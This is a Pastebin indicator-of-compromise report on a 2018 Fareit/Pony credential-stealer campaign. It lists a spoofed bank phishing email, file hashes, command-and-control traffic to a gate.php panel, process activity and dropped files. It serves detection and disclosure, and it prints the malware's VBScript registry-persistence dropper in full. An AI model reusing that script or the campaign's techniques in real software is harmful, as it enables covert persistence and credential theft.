SHARE
TWEET

#Fareit_181018

VRad Oct 19th, 2018 (edited) 162 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Pony #Fareit #ACE
  2.  
  3. https://pastebin.com/u0D14L5r
  4. FAQ:
  5. https://radetskiy.wordpress.com/?s=fareit
  6.  
  7. attack_vector
  8. --------------
  9. email attach (ace) > exe > %temp%\subfolder\filename.exe
  10.  
  11. email_headers
  12. --------------
  13. Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
  14.     by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
  15.     for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
  16.     (envelope-from spoof@citicorp.com)
  17. Received: from webmail.edwise.pk (localhost [IPv6:::1])
  18.     by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
  19.     Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
  20. Date: Thu, 18 Oct 2018 10:44:02 +0100
  21. From: CITIBANK <spoof@citicorp.com>
  22. To: undisclosed-recipients:;
  23. Subject: Payment Slip - Payment remitted 15/10/2018
  24. X-Sender: spoof@citicorp.com
  25. User-Agent: Roundcube Webmail/1.3.6
  26.  
  27. email_subjects
  28. --------------
  29. Payment Slip - Payment remitted 15/10/2018
  30.  
  31. files
  32. --------------
  33. SHA-256 ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
  34. File name   Payment slip.ace
  35. File size   264.85 KB
  36.  
  37. SHA-256 3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
  38. File name   Kakih       > %temp%\subfolder\filename.exe
  39. File size   618.27 KB
  40.  
  41. activity
  42. **************
  43.  
  44. netwrk
  45. --------------
  46. 194.36.173.171  armansaykham.com    POST /nonso/gate.php HTTP/1.0                           Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  47. 67.227.226.240  pornhouse.mobi      GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0    Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  48.  
  49. comp
  50. --------------
  51. [System Process]    0   TCP 194.36.173.171  80  TIME_WAIT
  52. filename.exe        2160    TCP 67.227.226.240  80  ESTABLISHED                                    
  53.  
  54. proc
  55. --------------
  56. "C:\Users\operator\Desktop\Payment slip.exe"
  57. "C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
  58. "C:\tmp\subfolder\filename.exe"
  59. "C:\tmp\subfolder\filename.exe"
  60. C:\Windows\SysWOW64\cmd.exe  /c ""C:\tmp\7710921.bat"       "C:\tmp\subfolder\filename.exe"   "
  61.  
  62. vbs
  63. --------------
  64. filenameOn Error Resume Next
  65. Set WshShell = CreateObject("WScript.Shell")
  66. myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
  67. Vbs ="C:\tmp\subfolder\filename.vbs"
  68. If WScript.Arguments.Count = 0 Then
  69. GG = second(now)
  70. WScript.Sleep 5000
  71. VV = second(now)
  72. Vbs = Vbs & " -FF"
  73. If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
  74. WScript.Quit
  75. end if
  76. WshShell.Run """C:\tmp\subfolder\filename.exe"""                  
  77.  
  78. persist
  79. --------------
  80. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              18.10.2018 17:32   
  81. Registry Key Name           c:\tmp\subfolder\filename.vbs   18.10.2018 17:32       
  82.  
  83. drop
  84. --------------
  85. C:\tmp\subfolder\filename.exe
  86. C:\tmp\subfolder\filename.vbs
  87.  
  88. # # #
  89. https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
  90. https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
  91. https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5
  92.  
  93. Harvests credentials from local FTP client softwares
  94. Harvests information related to installed mail clients
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top